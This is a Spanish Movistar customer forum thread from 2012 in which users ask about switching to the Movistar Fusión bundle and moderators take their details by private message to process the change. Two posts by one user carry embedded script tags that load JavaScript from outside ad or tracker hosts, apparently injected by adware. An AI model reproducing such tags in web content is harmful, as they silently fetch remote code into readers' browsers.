TRAMITAR MOVISTAR FUSION

ANAJOR
Yo probé el VDSL
TRAMITAR MOVISTAR FUSION
Hola, acabo de venir de una tienda movistar a la que ido para tramitar el tema de movistar fusion.

Me comentan que tengo que esperar entre 1-2 semanas porque movistar todavia no ha dado las indicaciones para tramitarlo...la verdad que no lo entiendo.

Yo tengo Adsl en casa y luego mi movil. Tambien tengo servicio multisim (3 euros mas al mes) que quiero seguir manteniendo.

¿Alguien me puede decir si se puede hacer ya? Estoy interesada en el de 49,90 + IVA.
Mensaje 1 de 115
6.421 Visitas
114 RESPUESTAS 114
2debravas
Yo probé el VDSL

Puedes intentarlo desde la propia web de Movistar. Mira un post que ha puesto Emilio-Movistar en la sección de Bienvenida de la Comunidad...http://www.movistar.es/particulares/oferta-combinada/fusion/opciones-tarifas/?soc=comunidad

---------------------------------------------------------------------------------------------

El de la escobilla..... no estáis sólos.....
Mensaje 2 de 115
4.822 Visitas
Isa-L-movistar
Antiguo Moderador

Buenos días, @ANAJOR!Emoticono feliz

Movistar Fusión ya se puede contratar desde el día 01/10/2012, si lo deseas puedes dirigirte a otra Tienda para gestionarlo,  también puedes enviarme por mp los datos (nif, nombre y apellidos, nº de móvil, nº de fijo) y lo miramos.

Saludos.Guiño




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 3 de 115
4.747 Visitas
ANAJOR
Yo probé el VDSL
Buenos dias, te acabo de enviar privado con los datos.

Gracias, espero respuesta.
Mensaje 4 de 115
4.715 Visitas
ANAJOR
Yo probé el VDSL
Parece complicado esto del alta en movistar fusion...ya que estoy viendo gente con muchos problemas con el alta.

El 1004 es desesperante!!!!!

Sigo esperando el alta....o respuesta de algo...

Gracias.
Mensaje 5 de 115
4.634 Visitas
Isa-L-movistar
Antiguo Moderador

Hola, @ANAJOR!Emoticono feliz

¡¡¡Recibido mp!!!   He solicitado el cambio a Movistar Fusión, en breve, se pondrán en contacto contigo para realizar la grabación correspondiente.

Saludos.Guiño




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 6 de 115
4.600 Visitas
ANAJOR
Yo probé el VDSL
Muchisimas gracias!!! Se han puesto en contacto conmigo y ya esta hecho!!! Con sms de confirmacion incluido.
Mensaje 7 de 115
4.589 Visitas
Isa-L-movistar
Antiguo Moderador

Hola, @ANAJOR!Emoticono feliz

 

Me alegra saber que ya está resuelto!!!Emoticono muy feliz

 

Saludos.Guiño

 

 




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 8 de 115
4.579 Visitas
Mejivk
Yo probé el VDSL

¡¡Que suerte, desde el 1 de Octubre llevo esperando¡¡¡ No tengo noticias, y eso que me apunte tambien a la reseva ue tenian en la pagina web.

Mensaje 9 de 115
4.576 Visitas
ElenaGoretti
Más integrado que la RDSI

Hola a tos ante todo. Es la primera vez que me conecto.

Mi pregunta es saber su puedo darme deexalta en Movistar fusion. tengo las 3 cosas pero no se realmente la velocidad de mi internet en el fijo . Si fuera de 3 metas no podría acceder a Movistar fusion?

 

Espero vuestra respuesta. Muchas gracias.

Elena

Mensaje 10 de 115
4.444 Visitas
Mejivk
Yo probé el VDSL

Isa, te he mandado un MP, haber si me lo puedes mirar. Gracias

Mensaje 11 de 115
4.411 Visitas
Isa-L-movistar
Antiguo Moderador

Buenos días, @Mejivk!Emoticono feliz

 

Me gustaría que tuvieras en cuenta para otras ocasiones, que debes permanecer a la espera de que alguno de nosotros (Moderadores del servicio), escribamos algún comentario sobre tu post o te solicitemos los datos, porque en el caso contrario (como ha sido el tuyo), si nos envías un mp sin haber recibido antes comentario alguno sobre tu consulta, lo que hacemos es relentizar el trabajo.... Ya que nuestro propósito es ir contestando por orden de antiguedad los mensajes y post de todos vosotros.

 

He mirado tu caso y no me consta tramitado el cambio a Fusión, dime que tarifa de Fusión es la que te interesa y si quieres la tramitamos desde aquí.Guiño

 

Saludos.Emoticono feliz

 

 




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 12 de 115
4.401 Visitas
16504052B
Más integrado que la RDSI

HOLA BUENOS DIAS ME GUSTARIA SABER SI SE PUEDE AGILIZAR LO DEL CAMBIO A MOVISTAR FUSION, PARA REALIZAR EL CAMBIO.

LO HE INTENTADO POR EL 1004 Y CADA VEZ SE ME DICE UNA COSA DIFERENTE. NO SE SI ME PODRIAS ECHAR UNA MANO POR FAVOR.

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 13 de 115
4.387 Visitas
Mejivk
Yo probé el VDSL

Uppp lo siento Emoticono avergonzado

 

Tengo el trío de Imagenio, quisiera la tarifa de MOVISTAR FUSION TELEVISION.

Mensaje 14 de 115
4.382 Visitas
Isa-L-movistar
Antiguo Moderador

Hola, @Mejivk!:smileyhappy:

He solicitado el cambio a Movistar Fusión Televisión, en breve, se pondrán en contacto contigo para realizar la grabación correspondiente.

Saludos.:smileywink:




Consulta nuestras ofertas y servicios sobre miMovistarTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.


No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar


Una de las ventajas es poder ver tu factura en Consulta Factura online.


También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram




Solución aceptada.png
Mensaje 15 de 115
4.360 Visitas
16504052B
Más integrado que la RDSI

Hola Isa. Me podrias echar una mano ami tambien?

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
Mensaje 16 de 115
4.292 Visitas
Mejivk
Yo probé el VDSL

Otra consulta mas Isa.

Tengo el MIT tu eliges 100 Mg gratis por tener ADSL a cambio de anular los 50 minutos a moviles a diario. ¿Cómo quedaría este tema al pasar a Fusión?

Gracias y un saludo

Mensaje 17 de 115
4.280 Visitas
carlos_jose
Yo probé el VDSL

Buenas tardes,

Estoy intentando contratar movistar fusion, yo tengo el DUO (ADSL a 10 MB) y un movil movistar, y quiero pasarme a movistar fusion fibra familiar (vamos con la tele). Y despues de llamar al 1004, dar mis datos y la grabacion con el consentimiento, y luego volver a llamar 4 o 5 veces hasta que consegui que me dieran un número de pedido, he comprobado que el web me estan tramitando solo el imagenio, ¿esto es normal?, y en la web de movistar movil, no tengo ninguna tramitación.

 

Que pasa, tengo que tener el imagenio, para luego poder hacer el paso a FUSION??

Pero claro, la instalación de la fibra en mi casa, también la tienen que hacer, o ¿lo hacen cuando pongan el imagenio?

 

También me indicaron que en 24h un técnico me llamaria, luego en las 4 o 5 llamadas posteriores me dijeron a lo largo de la semana y en otra que tienen hasta final de mes.

 

Bueno, espero que me podais aclarar las cosas o indicarme si estos son los pasas que se estan siguiendo.

 

Un saludo.

 

P.D: Por favor, que los operadores, comerciales o el 1004, que sepan o tengan un conocimiento más profundo de los productos, porque cuando fui a contratar el producto FUSION, tenia yo más idea que las personas que me atendieron.

Mensaje 18 de 115
4.257 Visitas
Mejivk
Yo probé el VDSL

Mensaje llegado al móvil.....muchas gracias.

 

 

Por cierto.........no he echo ninguna grabación.Emoticono feliz

Mensaje 19 de 115
4.248 Visitas
castrolaw
Más integrado que la RDSI

Buenas Tardes Isa,

 

Yo también realicé el cambio a Fusión el lunes 1/10 y hasta la fecha nadie ha contactado conmigo. Me podrías confirmar porfavor como está mi gestión??

 

Saludos Cordiales,

 

Xavier

Mensaje 20 de 115
4.199 Visitas
ramon_pg
Más integrado que la RDSI

He contratado movistar fusión en una tienda, ayer día 4.10.2012 conjuntamente con una portabilidad, y mi pregunta es la siguiente. A partir de la fecha de contrato ya se dispone de navegación 1gb i 500 minuts en el móvil? Como saber si esta todo confirmado?

Mensaje 21 de 115
4.120 Visitas
fernandopd
Mi vida cambió con el ADSL

Hola Isa

 


Hice el contrato en tienda el día 2-10-2012 para Movistar Fusión, incluido un móvil que antes tenía con otro tipo de contrato. También tenia duo ADSL 10 mb y por tanto lo pasé todo (incluido móvil) al nuevo Fusion. Hasta el momento no he recibido ninguna comunicación, no me han llamado ni me han mandado ningún mensaje. Al haber transcurrido varios dias sin noticias, ¿tengo que insistir en la tienda o es normal que al ser una modalidad nueva tarden más de lo normal por la avalancha de peticiones.?

 

Agradecido de antemano.

Mensaje 22 de 115
4.100 Visitas
ARGELAED
Yo probé el VDSL

Hola, yo ahora tengo el ADSL 10mb a 24,90 para toda la vida pero en lugar de tener los 500 minutos a moviles tengo un modem usb (pincho) si me paso a movistar fusión es posible continuar con estas condiciones ?????

 

Gracias

Mensaje 23 de 115
4.072 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @ramon_pg,

 

Bienvenido a la Comunidad.

 

Puedes enviarme un mp con el número de teléfono fijo y móvil, y NIF, para confirmarlo.

 

Un saludoEmoticono feliz

 


Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 24 de 115
3.918 Visitas
Rebeka-movistar
Antiguo Moderador

Hola @fernandopd,

 

Bienvenido a la Comunidad.

 

Puedes acudir al distribuidor para confirmar la activación.

 

Un saludoEmoticono feliz



Consulta nuestras ofertas y servicios sobre FusiónTarifas Móvil, ADSL y Fibra, Móviles, Televisión Ofertas  Movistar.

No te pierdas los últimos estrenos de Movistar+ en Cine, Series, Motor, Deportes, Toros y el mejor Fútbol

Ser usuario registrado de Movistar.es tiene sus ventajas. Si aún no lo eres, regístrate, ¡¡es gratis!!: mi movistar

Una de las ventajas es poder ver tu factura en Consulta Factura online.

También te invitamos a seguirnos en TwitterFacebook , Telegram e Instagram


Solución aceptada.png
Mensaje 25 de 115
3.911 Visitas